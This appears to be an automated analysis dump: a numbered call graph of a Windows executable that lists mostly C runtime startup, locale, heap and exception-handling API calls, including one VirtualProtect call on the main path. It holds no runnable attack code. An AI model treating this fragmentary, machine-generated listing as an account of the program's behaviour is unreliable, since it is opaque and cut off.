22468 fea261 22467->22468 22470 fdd5ed __dosmaperr 12 API calls 22468->22470 22469->22466 22473 fea21f 22469->22473 22471 fea24c 22470->22471 22471->22461 22472 fea246 SetStdHandle 22472->22471 22473->22471 22473->22472 22474->22464 22475->22432 22476->22403 18671 fd60bb 18680 fd68f7 GetModuleHandleW 18671->18680 18674 fd60f9 18685 fe01e0 18674->18685 18675 fd60c7 18676 fd60d2 18675->18676 18682 fe01c2 18675->18682 18681 fd60c3 18680->18681 18681->18674 18681->18675 18688 fe0004 18682->18688 18686 fe0004 CallUnexpected 21 API calls 18685->18686 18687 fd6101 18686->18687 18689 fe0043 18688->18689 18690 fe0031 18688->18690 18700 fdfecc 18689->18700 18715 fe00cc GetModuleHandleW 18690->18715 18694 fe0080 18694->18676 18698 fe0095 18701 fdfed8 ___scrt_is_nonwritable_in_current_image 18700->18701 18723 fdcd04 EnterCriticalSection 18701->18723 18703 fdfee2 18724 fdff19 18703->18724 18705 fdfeef 18728 fdff0d 18705->18728 18708 fe009b 18785 fe010f 18708->18785 18711 fe00b9 18713 fe0131 CallUnexpected 3 API calls 18711->18713 18712 fe00a9 GetCurrentProcess TerminateProcess 18712->18711 18714 fe00c1 ExitProcess 18713->18714 18716 fe0036 18715->18716 18716->18689 18717 fe0131 GetModuleHandleExW 18716->18717 18718 fe0170 GetProcAddress 18717->18718 18719 fe0191 18717->18719 18718->18719 18722 fe0184 18718->18722 18720 fe0197 FreeLibrary 18719->18720 18721 fe0042 18719->18721 18720->18721 18721->18689 18722->18719 18723->18703 18725 fdff25 ___scrt_is_nonwritable_in_current_image 18724->18725 18727 fdff8c CallUnexpected 18725->18727 18731 fe1d36 18725->18731 18727->18705 18784 fdcd4c LeaveCriticalSection 18728->18784 18730 fdfefb 18730->18694 18730->18708 18732 fe1d42 __EH_prolog3 18731->18732 18735 fe1a8e 18732->18735 18734 fe1d69 codecvt 18734->18727 18736 fe1a9a ___scrt_is_nonwritable_in_current_image 18735->18736 18743 fdcd04 EnterCriticalSection 18736->18743 18738 fe1aa8 18744 fe1c46 18738->18744 18743->18738 18745 fe1c65 18744->18745 18746 fe1ab5 18744->18746 18745->18746 18751 fe3cf6 18745->18751 18748 fe1add 18746->18748 18783 fdcd4c LeaveCriticalSection 18748->18783 18750 fe1ac6 18750->18734 18752 fe3d2b 18751->18752 18753 fe3d01 HeapFree 18751->18753 18752->18746 18753->18752 18754 fe3d16 GetLastError 18753->18754 18755 fe3d23 __dosmaperr 18754->18755 18757 fdd600 18755->18757 18760 fe2b91 GetLastError 18757->18760 18759 fdd605 18759->18752 18761 fe2ba7 18760->18761 18762 fe2bad 18760->18762 18763 fe54c7 __Getctype 5 API calls 18761->18763 18764 fe5506 __Getctype 5 API calls 18762->18764 18766 fe2bb1 SetLastError 18762->18766 18763->18762 18765 fe2bc9 18764->18765 18765->18766 18768 fe3c99 __Getctype 10 API calls 18765->18768 18766->18759 18769 fe2bde 18768->18769 18770 fe2be6 18769->18770 18771 fe2bf7 18769->18771 18772 fe5506 __Getctype 5 API calls 18770->18772 18773 fe5506 __Getctype 5 API calls 18771->18773 18781 fe2bf4 18772->18781 18774 fe2c03 18773->18774 18775 fe2c1e 18774->18775 18776 fe2c07 18774->18776 18777 fe286e __Getctype 10 API calls 18775->18777 18778 fe5506 __Getctype 5 API calls 18776->18778 18780 fe2c29 18777->18780 18778->18781 18779 fe3cf6 ___free_lconv_mon 10 API calls 18779->18766 18782 fe3cf6 ___free_lconv_mon 10 API calls 18780->18782 18781->18779 18782->18766 18783->18750 18784->18730 18790 fea021 GetPEB 18785->18790 18788 fe00a5 18788->18711 18788->18712 18789 fe0119 GetPEB 18789->18788 18791 fe0114 18790->18791 18792 fea03b 18790->18792 18791->18788 18791->18789 18794 fe5339 18792->18794 18797 fe52b6 18794->18797 18798 fe52e4 18797->18798 18802 fe52e0 18797->18802 18798->18802 18804 fe51eb 18798->18804 18801 fe52fe GetProcAddress 18801->18802 18803 fe530e std::_Lockit::_Lockit 18801->18803 18802->18791 18803->18802 18810 fe51fc ___vcrt_InitializeCriticalSectionEx 18804->18810 18805 fe5292 18805->18801 18805->18802 18806 fe521a LoadLibraryExW 18807 fe5299 18806->18807 18808 fe5235 GetLastError 18806->18808 18807->18805 18809 fe52ab FreeLibrary 18807->18809 18808->18810 18809->18805 18810->18805 18810->18806 18811 fe5268 LoadLibraryExW 18810->18811 18811->18807 18811->18810 23931 fe4f86 23932 fe4f92 ___scrt_is_nonwritable_in_current_image 23931->23932 23943 fdcd04 EnterCriticalSection 23932->23943 23934 fe4f99 23944 fea102 23934->23944 23942 fe4fb7 23968 fe4fdd 23942->23968 23943->23934 23945 fea10e ___scrt_is_nonwritable_in_current_image 23944->23945 23946 fea138 23945->23946 23947 fea117 23945->23947 23971 fdcd04 EnterCriticalSection 23946->23971 23948 fdd600 __Wcrtomb 12 API calls 23947->23948 23950 fea11c 23948->23950 23952 fda90f __strnicoll 39 API calls 23950->23952 23951 fea144 23956 fea170 23951->23956 23972 fea052 23951->23972 23953 fe4fa8 23952->23953 23953->23942 23957 fe4e20 GetStartupInfoW 23953->23957 23979 fea197 23956->23979 23958 fe4e3d 23957->23958 23959 fe4ed1 23957->23959 23958->23959 23960 fea102 40 API calls 23958->23960 23963 fe4ed6 23959->23963 23961 fe4e65 23960->23961 23961->23959 23962 fe4e95 GetFileType 23961->23962 23962->23961 23964 fe4edd 23963->23964 23965 fe4f20 GetStdHandle 23964->23965 23966 fe4f82 23964->23966 23967 fe4f33 GetFileType 23964->23967 23965->23964 23966->23942 23967->23964 23983 fdcd4c LeaveCriticalSection 23968->23983 23970 fe4fc8 23971->23951 23973 fe3c99 __Getctype 12 API calls 23972->23973 23974 fea064 23973->23974 23976 fe55c3 6 API calls 23974->23976 23978 fea071 23974->23978 23975 fe3cf6 ___free_lconv_mon 12 API calls 23977 fea0c6 23975->23977 23976->23974 23977->23951 23978->23975 23982 fdcd4c LeaveCriticalSection 23979->23982 23981 fea19e 23981->23953 23982->23981 23983->23970 18812 fd5f80 18813 fd5f8c ___scrt_is_nonwritable_in_current_image 18812->18813 18837 fd62b3 18813->18837 18815 fd5f93 18816 fd60ec 18815->18816 18823 fd5fbd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 18815->18823 18873 fd67dd IsProcessorFeaturePresent 18816->18873 18818 fd60f3 18819 fd60f9 18818->18819 18854 fe021c 18818->18854 18821 fe01e0 CallUnexpected 21 API calls 18819->18821 18822 fd6101 18821->18822 18827 fd605d 18823->18827 18836 fd5fdc 18823->18836 18857 fe01f6 18823->18857 18825 fd6063 18849 fd3d0a VirtualProtect 18825->18849 18845 fdfe5a 18827->18845 18830 fd68f7 GetModuleHandleW 18831 fd6084 18830->18831 18831->18818 18832 fd6088 18831->18832 18833 fd6091 18832->18833 18864 fe01d1 18832->18864 18867 fd6424 18833->18867 18838 fd62bc 18837->18838 18877 fd64bc IsProcessorFeaturePresent 18838->18877 18842 fd62d1 18842->18815 18843 fd62cd 18843->18842 18887 fd923d 18843->18887 18846 fdfe68 18845->18846 18847 fdfe63 18845->18847 18846->18825 18945 fdfbb4 18847->18945 19545 fd3062 18849->19545 18855 fe0004 CallUnexpected 21 API calls 18854->18855 18856 fe022d 18855->18856 18856->18819 18858 fe1f6c ___scrt_is_nonwritable_in_current_image 18857->18858 18859 fe020c std::_Lockit::_Lockit 18857->18859 18860 fe2a40 __Getctype 39 API calls 18858->18860 18859->18827 18863 fe1f7d 18860->18863 18861 fdf3f9 CallUnexpected 39 API calls 18862 fe1fa7 18861->18862 18863->18861 18865 fe0004 CallUnexpected 21 API calls 18864->18865 18866 fe01dc 18865->18866 18866->18833 18868 fd6430 18867->18868 18869 fd6446 18868->18869 19999 fe1edd 18868->19999 18869->18836 18871 fd643e 18872 fd923d ___scrt_uninitialize_crt 7 API calls 18871->18872 18872->18869 18874 fd67f3 CallUnexpected codecvt 18873->18874 18875 fd689e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18874->18875 18876 fd68e2 CallUnexpected 18875->18876 18876->18818 18878 fd62c8 18877->18878 18879 fd921e 18878->18879 18893 fda2f7 18879->18893 18883 fd923a 18883->18843 18884 fd922f 18884->18883 18907 fda333 18884->18907 18886 fd9227 18886->18843 18888 fd9246 18887->18888 18889 fd9250 18887->18889 18890 fd93b6 ___vcrt_uninitialize_ptd 6 API calls 18888->18890 18889->18842 18891 fd924b 18890->18891 18892 fda333 ___vcrt_uninitialize_locks DeleteCriticalSection 18891->18892 18892->18889 18894 fda300 18893->18894 18896 fda329 18894->18896 18897 fd9223 18894->18897 18911 fda53c 18894->18911 18898 fda333 ___vcrt_uninitialize_locks DeleteCriticalSection 18896->18898 18897->18886 18899 fd9383 18897->18899 18898->18897 18928 fda44d 18899->18928 18902 fd9398 18902->18884 18905 fd93b3 18905->18884 18908 fda35d 18907->18908 18909 fda33e 18907->18909 18908->18886 18910 fda348 DeleteCriticalSection 18909->18910 18910->18908 18910->18910 18916 fda362 18911->18916 18914 fda574 InitializeCriticalSectionAndSpinCount 18915 fda55f 18914->18915 18915->18894 18917 fda37f 18916->18917 18920 fda383 18916->18920 18917->18914 18917->18915 18918 fda3eb GetProcAddress 18918->18917 18920->18917 18920->18918 18921 fda3dc 18920->18921 18923 fda402 LoadLibraryExW 18920->18923 18921->18918 18922 fda3e4 FreeLibrary 18921->18922 18922->18918 18924 fda419 GetLastError 18923->18924 18925 fda449 18923->18925 18924->18925 18926 fda424 ___vcrt_InitializeCriticalSectionEx 18924->18926 18925->18920 18926->18925 18927 fda43a LoadLibraryExW 18926->18927 18927->18920 18929 fda362 ___vcrt_InitializeCriticalSectionEx 5 API calls 18928->18929 18930 fd938d 18929->18930 18930->18902 18931 fda4fe 18930->18931 18932 fda362 ___vcrt_InitializeCriticalSectionEx 5 API calls 18931->18932 18933 fda518 18932->18933 18934 fda533 TlsSetValue 18933->18934 18935 fd93a6 18933->18935 18934->18935 18935->18905 18936 fd93b6 18935->18936 18937 fd93c6 18936->18937 18938 fd93c0 18936->18938 18937->18902 18940 fda488 18938->18940 18941 fda362 ___vcrt_InitializeCriticalSectionEx 5 API calls 18940->18941 18942 fda4a2 18941->18942 18943 fda4ba TlsFree 18942->18943 18944 fda4ae 18942->18944 18943->18944 18944->18937 18946 fdfbbd 18945->18946 18949 fdfbd3 18945->18949 18946->18949 18951 fdfbe0 18946->18951 18948 fdfbca 18948->18949 18968 fdfd4b 18948->18968 18949->18846 18952 fdfbec 18951->18952 18953 fdfbe9 18951->18953 18976 fe98f7 18952->18976 18953->18948 18958 fdfbfd 18960 fe3cf6 ___free_lconv_mon 12 API calls 18958->18960 18959 fdfc09 19003 fdfc3a 18959->19003 18962 fdfc03 18960->18962 18962->18948 18964 fe3cf6 ___free_lconv_mon 12 API calls 18965 fdfc2d 18964->18965 18966 fe3cf6 ___free_lconv_mon 12 API calls 18965->18966 18967 fdfc33 18966->18967 18967->18948 18969 fdfdbc 18968->18969 18972 fdfd5a 18968->18972 18969->18949 18970 fe8847 WideCharToMultiByte _Fputc 18970->18972 18971 fe3c99 __Getctype 12 API calls 18971->18972 18972->18969 18972->18970 18972->18971 18973 fdfdc0 18972->18973 18975 fe3cf6 ___free_lconv_mon 12 API calls 18972->18975 18974 fe3cf6 ___free_lconv_mon 12 API calls 18973->18974 18974->18969 18975->18972 18977 fdfbf2 18976->18977 18978 fe9900 18976->18978 18982 fe9bf9 GetEnvironmentStringsW 18977->18982 19025 fe2afb 18978->19025 18983 fdfbf7 18982->18983 18984 fe9c11 18982->18984 18983->18958 18983->18959 18985 fe8847 _Fputc WideCharToMultiByte 18984->18985 18986 fe9c2e 18985->18986 18987 fe9c38 FreeEnvironmentStringsW 18986->18987 18988 fe9c43 18986->18988 18987->18983 18989 fe3d30 std::_Locinfo::_Locinfo_dtor 13 API calls 18988->18989 18990 fe9c4a 18989->18990 18991 fe9c52 18990->18991 18992 fe9c63 18990->18992 18993 fe3cf6 ___free_lconv_mon 12 API calls 18991->18993 18994 fe8847 _Fputc WideCharToMultiByte 18992->18994 18996 fe9c57 FreeEnvironmentStringsW 18993->18996 18995 fe9c73 18994->18995 18997 fe9c7a 18995->18997 18998 fe9c82 18995->18998 18996->18983 18999 fe3cf6 ___free_lconv_mon 12 API calls 18997->18999 19000 fe3cf6 ___free_lconv_mon 12 API calls 18998->19000 19001 fe9c80 FreeEnvironmentStringsW 18999->19001 19000->19001 19001->18983 19004 fdfc4f 19003->19004 19005 fe3c99 __Getctype 12 API calls 19004->19005 19006 fdfc76 19005->19006 19007 fdfc7e 19006->19007 19016 fdfc88 19006->19016 19008 fe3cf6 ___free_lconv_mon 12 API calls 19007->19008 19024 fdfc10 19008->19024 19009 fdfce5 19010 fe3cf6 ___free_lconv_mon 12 API calls 19009->19010 19010->19024 19011 fe3c99 __Getctype 12 API calls 19011->19016 19012 fdfcf4 19535 fdfd1c 19012->19535 19016->19009 19016->19011 19016->19012 19018 fdfd0f 19016->19018 19020 fe3cf6 ___free_lconv_mon 12 API calls 19016->19020 19526 fe1fa8 19016->19526 19017 fe3cf6 ___free_lconv_mon 12 API calls 19019 fdfd01 19017->19019 19541 fda93c IsProcessorFeaturePresent 19018->19541 19022 fe3cf6 ___free_lconv_mon 12 API calls 19019->19022 19020->19016 19022->19024 19023 fdfd1b 19024->18964 19026 fe2b0c 19025->19026 19027 fe2b06 19025->19027 19031 fe2b12 19026->19031 19076 fe5506 19026->19076 19073 fe54c7 19027->19073 19049 fe2b17 19031->19049 19091 fdf3f9 19031->19091 19034 fe2b36 19036 fe2b3e 19034->19036 19037 fe2b53 19034->19037 19038 fe5506 __Getctype 5 API calls 19036->19038 19039 fe5506 __Getctype 5 API calls 19037->19039 19041 fe2b4a 19038->19041 19040 fe2b5f 19039->19040 19042 fe2b72 19040->19042 19043 fe2b63 19040->19043 19046 fe3cf6 ___free_lconv_mon 12 API calls 19041->19046 19086 fe286e 19042->19086 19044 fe5506 __Getctype 5 API calls 19043->19044 19044->19041 19046->19031 19048 fe3cf6 ___free_lconv_mon 12 API calls 19048->19049 19050 fe9702 19049->19050 19331 fe9857 19050->19331 19056 fe9756 19057 fe975e 19056->19057 19058 fe976c 19056->19058 19059 fe3cf6 ___free_lconv_mon 12 API calls 19057->19059 19356 fe9952 19058->19356 19062 fe9745 19059->19062 19062->18977 19063 fe97a4 19064 fdd600 __Wcrtomb 12 API calls 19063->19064 19066 fe97a9 19064->19066 19065 fe97eb 19068 fe9834 19065->19068 19367 fe9374 19065->19367 19069 fe3cf6 ___free_lconv_mon 12 API calls 19066->19069 19067 fe97bf 19067->19065 19070 fe3cf6 ___free_lconv_mon 12 API calls 19067->19070 19072 fe3cf6 ___free_lconv_mon 12 API calls 19068->19072 19069->19062 19070->19065 19072->19062 19074 fe52b6 std::_Lockit::_Lockit 5 API calls 19073->19074 19075 fe54e3 19074->19075 19075->19026 19077 fe52b6 std::_Lockit::_Lockit 5 API calls 19076->19077 19078 fe2b26 19077->19078 19078->19031 19079 fe3c99 19078->19079 19084 fe3ca6 __Getctype 19079->19084 19080 fe3cd1 HeapAlloc 19082 fe3ce4 19080->19082 19080->19084 19081 fe3ce6 19083 fdd600 __Wcrtomb 11 API calls 19081->19083 19082->19034 19083->19082 19084->19080 19084->19081 19102 fe1a05 19084->19102 19116 fe2702 19086->19116 19218 fe8593 19091->19218 19094 fdf409 19096 fdf432 19094->19096 19097 fdf413 IsProcessorFeaturePresent 19094->19097 19099 fe01e0 CallUnexpected 21 API calls 19096->19099 19098 fdf41f 19097->19098 19248 fda713 19098->19248 19101 fdf43c 19099->19101 19105 fe1a32 19102->19105 19106 fe1a3e ___scrt_is_nonwritable_in_current_image 19105->19106 19111 fdcd04 EnterCriticalSection 19106->19111 19108 fe1a49 19112 fe1a85 19108->19112 19111->19108 19115 fdcd4c LeaveCriticalSection 19112->19115 19114 fe1a10 19114->19084 19115->19114 19117 fe270e ___scrt_is_nonwritable_in_current_image 19116->19117 19130 fdcd04 EnterCriticalSection 19117->19130 19119 fe2718 19131 fe2748 19119->19131 19122 fe2814 19123 fe2820 ___scrt_is_nonwritable_in_current_image 19122->19123 19135 fdcd04 EnterCriticalSection 19123->19135 19125 fe282a 19136 fe29f5 19125->19136 19127 fe2842 19140 fe2862 19127->19140 19130->19119 19134 fdcd4c LeaveCriticalSection 19131->19134 19133 fe2736 19133->19122 19134->19133 19135->19125 19137 fe2a2b __Getctype 19136->19137 19138 fe2a04 __Getctype 19136->19138 19137->19127 19138->19137 19143 feb041 19138->19143 19217 fdcd4c LeaveCriticalSection 19140->19217 19142 fe2850 19142->19048 19144 feb057 19143->19144 19145 feb0c1 19143->19145 19144->19145 19149 feb08a 19144->19149 19152 fe3cf6 ___free_lconv_mon 12 API calls 19144->19152 19147 fe3cf6 ___free_lconv_mon 12 API calls 19145->19147 19170 feb10f 19145->19170 19148 feb0e3 19147->19148 19150 fe3cf6 ___free_lconv_mon 12 API calls 19148->19150 19151 feb0ac 19149->19151 19158 fe3cf6 ___free_lconv_mon 12 API calls 19149->19158 19153 feb0f6 19150->19153 19154 fe3cf6 ___free_lconv_mon 12 API calls 19151->19154 19156 feb07f 19152->19156 19157 fe3cf6 ___free_lconv_mon 12 API calls 19153->19157 19159 feb0b6 19154->19159 19155 feb17d 19160 fe3cf6 ___free_lconv_mon 12 API calls 19155->19160 19171 fea2f7 19156->19171 19162 feb104 19157->19162 19163 feb0a1 19158->19163 19165 fe3cf6 ___free_lconv_mon 12 API calls 19159->19165 19166 feb183 19160->19166 19167 fe3cf6 ___free_lconv_mon 12 API calls 19162->19167 19199 fea7ab 19163->19199 19164 feb11d 19164->19155 19169 fe3cf6 12 API calls ___free_lconv_mon 19164->19169 19165->19145 19166->19137 19167->19170 19169->19164 19211 feb1b2 19170->19211 19172 fea308 19171->19172 19173 fea3f1 19171->19173 19174 fea319 19172->19174 19175 fe3cf6 ___free_lconv_mon 12 API calls 19172->19175 19173->19149 19176 fea32b 19174->19176 19177 fe3cf6 ___free_lconv_mon 12 API calls 19174->19177 19175->19174 19178 fea33d 19176->19178 19179 fe3cf6 ___free_lconv_mon 12 API calls 19176->19179 19177->19176 19180 fea34f 19178->19180 19181 fe3cf6 ___free_lconv_mon 12 API calls 19178->19181 19179->19178 19182 fea361 19180->19182 19183 fe3cf6 ___free_lconv_mon 12 API calls 19180->19183 19181->19180 19184 fea373 19182->19184 19185 fe3cf6 ___free_lconv_mon 12 API calls 19182->19185 19183->19182 19186 fea385 19184->19186 19187 fe3cf6 ___free_lconv_mon 12 API calls 19184->19187 19185->19184 19188 fea397 19186->19188 19189 fe3cf6 ___free_lconv_mon 12 API calls 19186->19189 19187->19186 19190 fea3a9 19188->19190 19191 fe3cf6 ___free_lconv_mon 12 API calls 19188->19191 19189->19188 19192 fea3bb 19190->19192 19193 fe3cf6 ___free_lconv_mon 12 API calls 19190->19193 19191->19190 19194 fea3cd 19192->19194 19195 fe3cf6 ___free_lconv_mon 12 API calls 19192->19195 19193->19192 19196 fea3df 19194->19196 19197 fe3cf6 ___free_lconv_mon 12 API calls 19194->19197 19195->19194 19196->19173 19198 fe3cf6 ___free_lconv_mon 12 API calls 19196->19198 19197->19196 19198->19173 19200 fea7b8 19199->19200 19210 fea810 19199->19210 19201 fea7c8 19200->19201 19202 fe3cf6 ___free_lconv_mon 12 API calls 19200->19202 19203 fe3cf6 ___free_lconv_mon 12 API calls 19201->19203 19205 fea7da 19201->19205 19202->19201 19203->19205 19204 fea7ec 19207 fea7fe 19204->19207 19208 fe3cf6 ___free_lconv_mon 12 API calls 19204->19208 19205->19204 19206 fe3cf6 ___free_lconv_mon 12 API calls 19205->19206 19206->19204 19209 fe3cf6 ___free_lconv_mon 12 API calls 19207->19209 19207->19210 19208->19207 19209->19210 19210->19151 19212 feb1bf 19211->19212 19213 feb1de 19211->19213 19212->19213 19214 feacc6 __Getctype 12 API calls 19212->19214 19213->19164 19215 feb1d8 19214->19215 19216 fe3cf6 ___free_lconv_mon 12 API calls 19215->19216 19216->19213 19217->19142 19254 fe84c5 19218->19254 19221 fe85d8 19222 fe85e4 ___scrt_is_nonwritable_in_current_image 19221->19222 19223 fe2b91 __Wcrtomb 12 API calls 19222->19223 19226 fe8611 CallUnexpected 19222->19226 19229 fe860b CallUnexpected 19222->19229 19223->19229 19224 fe8658 19225 fdd600 __Wcrtomb 12 API calls 19224->19225 19227 fe865d 19225->19227 19228 fe8684 19226->19228 19268 fdcd04 EnterCriticalSection 19226->19268 19265 fda90f 19227->19265 19233 fe86c6 19228->19233 19234 fe87b7 19228->19234 19244 fe86f5 19228->19244 19229->19224 19229->19226 19247 fe8642 19229->19247 19233->19244 19269 fe2a40 GetLastError 19233->19269 19235 fe87c2 19234->19235 19300 fdcd4c LeaveCriticalSection 19234->19300 19238 fe01e0 CallUnexpected 21 API calls 19235->19238 19239 fe87ca 19238->19239 19242 fe2a40 __Getctype 39 API calls 19245 fe874a 19242->19245 19243 fe2a40 __Getctype 39 API calls 19243->19244 19296 fe8764 19244->19296 19246 fe2a40 __Getctype 39 API calls 19245->19246 19245->19247 19246->19247 19247->19094 19249 fda72f CallUnexpected codecvt 19248->19249 19250 fda75b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19249->19250 19253 fda82c CallUnexpected 19250->19253 19252 fda84a 19252->19096 19323 fd614a 19253->19323 19255 fe84d1 ___scrt_is_nonwritable_in_current_image 19254->19255 19260 fdcd04 EnterCriticalSection 19255->19260 19257 fe84df 19261 fe851d 19257->19261 19260->19257 19264 fdcd4c LeaveCriticalSection 19261->19264 19263 fdf3fe 19263->19094 19263->19221 19264->19263 19301 fda85b 19265->19301 19268->19228 19270 fe2a56 19269->19270 19273 fe2a5c 19269->19273 19271 fe54c7 __Getctype 5 API calls 19270->19271 19271->19273 19272 fe5506 __Getctype 5 API calls 19274 fe2a78 19272->19274 19273->19272 19293 fe2a60 SetLastError 19273->19293 19276 fe3c99 __Getctype 12 API calls 19274->19276 19274->19293 19279 fe2a8d 19276->19279 19277 fe2af5 19280 fdf3f9 CallUnexpected 37 API calls 19277->19280 19278 fe2af0 19278->19243 19281 fe2aa6 19279->19281 19282 fe2a95 19279->19282 19284 fe2afa 19280->19284 19283 fe5506 __Getctype 5 API calls 19281->19283 19285 fe5506 __Getctype 5 API calls 19282->19285 19287 fe2ab2 19283->19287 19286 fe2aa3 19285->19286 19291 fe3cf6 ___free_lconv_mon 12 API calls 19286->19291 19288 fe2acd 19287->19288 19289 fe2ab6 19287->19289 19292 fe286e __Getctype 12 API calls 19288->19292 19290 fe5506 __Getctype 5 API calls 19289->19290 19290->19286 19291->19293 19294 fe2ad8 19292->19294 19293->19277 19293->19278 19295 fe3cf6 ___free_lconv_mon 12 API calls 19294->19295 19295->19293 19297 fe876a 19296->19297 19298 fe873b 19296->19298 19322 fdcd4c LeaveCriticalSection 19297->19322 19298->19242 19298->19245 19298->19247 19300->19235 19302 fda86d _Fputc 19301->19302 19307 fda892 19302->19307 19308 fda8a2 19307->19308 19310 fda8a9 19307->19310 19309 fda6b0 _Fputc 14 API calls 19308->19309 19309->19310 19311 fda885 19310->19311 19312 fda687 _Fputc GetLastError SetLastError 19310->19312 19316 fda64b 19311->19316 19313 fda8de 19312->19313 19313->19311 19314 fda93c _Deallocate 11 API calls 19313->19314 19315 fda90e 19314->19315 19317 fda657 19316->19317 19318 fda66e 19317->19318 19319 fda6f6 _Fputc 39 API calls 19317->19319 19320 fda681 19318->19320 19321 fda6f6 _Fputc 39 API calls 19318->19321 19319->19318 19320->19247 19321->19320 19322->19298 19324 fd6153 IsProcessorFeaturePresent 19323->19324 19325 fd6152 19323->19325 19327 fd6a87 19324->19327 19325->19252 19330 fd6a4a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19327->19330 19329 fd6b6a 19329->19252 19330->19329 19332 fe9863 ___scrt_is_nonwritable_in_current_image 19331->19332 19333 fe987d 19332->19333 19375 fdcd04 EnterCriticalSection 19332->19375 19335 fe972c 19333->19335 19338 fdf3f9 CallUnexpected 39 API calls 19333->19338 19342 fe9482 19335->19342 19336 fe98b9 19376 fe98d6 19336->19376 19339 fe98f6 19338->19339 19340 fe988d 19340->19336 19341 fe3cf6 ___free_lconv_mon 12 API calls 19340->19341 19341->19336 19380 fdee5a 19342->19380 19345 fe94b5 19347 fe94cc 19345->19347 19348 fe94ba GetACP 19345->19348 19346 fe94a3 GetOEMCP 19346->19347 19347->19062 19349 fe3d30 19347->19349 19348->19347 19350 fe3d6e 19349->19350 19354 fe3d3e __Getctype 19349->19354 19351 fdd600 __Wcrtomb 12 API calls 19350->19351 19353 fe3d6c 19351->19353 19352 fe3d59 HeapAlloc 19352->19353 19352->19354 19353->19056 19354->19350 19354->19352 19355 fe1a05 codecvt 2 API calls 19354->19355 19355->19354 19357 fe9482 41 API calls 19356->19357 19358 fe9972 19357->19358 19360 fe99af IsValidCodePage 19358->19360 19365 fe99eb codecvt 19358->19365 19359 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19361 fe9799 19359->19361 19362 fe99c1 19360->19362 19360->19365 19361->19063 19361->19067 19363 fe99f0 GetCPInfo 19362->19363 19366 fe99ca codecvt 19362->19366 19363->19365 19363->19366 19365->19359 19422 fe9556 19366->19422 19368 fe9380 ___scrt_is_nonwritable_in_current_image 19367->19368 19500 fdcd04 EnterCriticalSection 19368->19500 19370 fe938a 19501 fe93c1 19370->19501 19375->19340 19379 fdcd4c LeaveCriticalSection 19376->19379 19378 fe98dd 19378->19333 19379->19378 19381 fdee78 19380->19381 19382 fdee71 19380->19382 19381->19382 19383 fe2a40 __Getctype 39 API calls 19381->19383 19382->19345 19382->19346 19384 fdee99 19383->19384 19388 fe3d7e 19384->19388 19389 fdeeaf 19388->19389 19390 fe3d91 19388->19390 19392 fe3ddc 19389->19392 19390->19389 19396 feb28d 19390->19396 19393 fe3def 19392->19393 19394 fe3e04 19392->19394 19393->19394 19417 fe993f 19393->19417 19394->19382 19397 feb299 ___scrt_is_nonwritable_in_current_image 19396->19397 19398 fe2a40 __Getctype 39 API calls 19397->19398 19399 feb2a2 19398->19399 19400 feb2e8 19399->19400 19409 fdcd04 EnterCriticalSection 19399->19409 19400->19389 19402 feb2c0 19410 feb30e 19402->19410 19407 fdf3f9 CallUnexpected 39 API calls 19408 feb30d 19407->19408 19409->19402 19411 feb2d1 19410->19411 19412 feb31c __Getctype 19410->19412 19414 feb2ed 19411->19414 19412->19411 19413 feb041 __Getctype 12 API calls 19412->19413 19413->19411 19415 fdcd4c std::_Lockit::~_Lockit LeaveCriticalSection 19414->19415 19416 feb2e4 19415->19416 19416->19400 19416->19407 19418 fe2a40 __Getctype 39 API calls 19417->19418 19419 fe9944 19418->19419 19420 fe9857 __strnicoll 39 API calls 19419->19420 19421 fe994f 19420->19421 19421->19394 19423 fe957e GetCPInfo 19422->19423 19432 fe9647 19422->19432 19428 fe9596 19423->19428 19423->19432 19425 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19427 fe9700 19425->19427 19427->19365 19433 fe60e1 19428->19433 19431 fe63d8 43 API calls 19431->19432 19432->19425 19434 fdee5a __strnicoll 39 API calls 19433->19434 19435 fe6101 19434->19435 19453 fe87cb 19435->19453 19437 fe61c5 19439 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19437->19439 19438 fe61bd 19456 fd5d1d 19438->19456 19441 fe61e8 19439->19441 19440 fe612e 19440->19437 19440->19438 19443 fe3d30 std::_Locinfo::_Locinfo_dtor 13 API calls 19440->19443 19444 fe6153 __alloca_probe_16 codecvt 19440->19444 19448 fe63d8 19441->19448 19443->19444 19444->19438 19445 fe87cb std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 19444->19445 19446 fe619e 19445->19446 19446->19438 19447 fe61a9 GetStringTypeW 19446->19447 19447->19438 19449 fdee5a __strnicoll 39 API calls 19448->19449 19450 fe63eb 19449->19450 19463 fe61ea 19450->19463 19454 fe87dc MultiByteToWideChar 19453->19454 19454->19440 19457 fd5d27 19456->19457 19459 fd5d38 19456->19459 19457->19459 19460 fdab3a 19457->19460 19459->19437 19461 fe3cf6 ___free_lconv_mon 12 API calls 19460->19461 19462 fdab52 19461->19462 19462->19459 19464 fe6205 19463->19464 19465 fe87cb std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 19464->19465 19468 fe624b 19465->19468 19466 fe63c3 19467 fd614a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 5 API calls 19466->19467 19469 fe63d6 19467->19469 19468->19466 19470 fe3d30 std::_Locinfo::_Locinfo_dtor 13 API calls 19468->19470 19472 fe6271 __alloca_probe_16 19468->19472 19483 fe62f7 19468->19483 19469->19431 19470->19472 19471 fd5d1d __freea 12 API calls 19471->19466 19473 fe87cb std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 19472->19473 19472->19483 19474 fe62b6 19473->19474 19474->19483 19491 fe5685 19474->19491 19477 fe62e8 19481 fe5685 std::_Locinfo::_Locinfo_dtor 6 API calls 19477->19481 19477->19483 19478 fe6320 19479 fe63ab 19478->19479 19482 fe3d30 std::_Locinfo::_Locinfo_dtor 13 API calls 19478->19482 19484 fe6332 __alloca_probe_16 19478->19484 19480 fd5d1d __freea 12 API calls 19479->19480 19480->19483 19481->19483 19482->19484 19483->19471 19484->19479 19485 fe5685 std::_Locinfo::_Locinfo_dtor 6 API calls 19484->19485 19486 fe6375 19485->19486 19486->19479 19497 fe8847 19486->19497 19488 fe638f 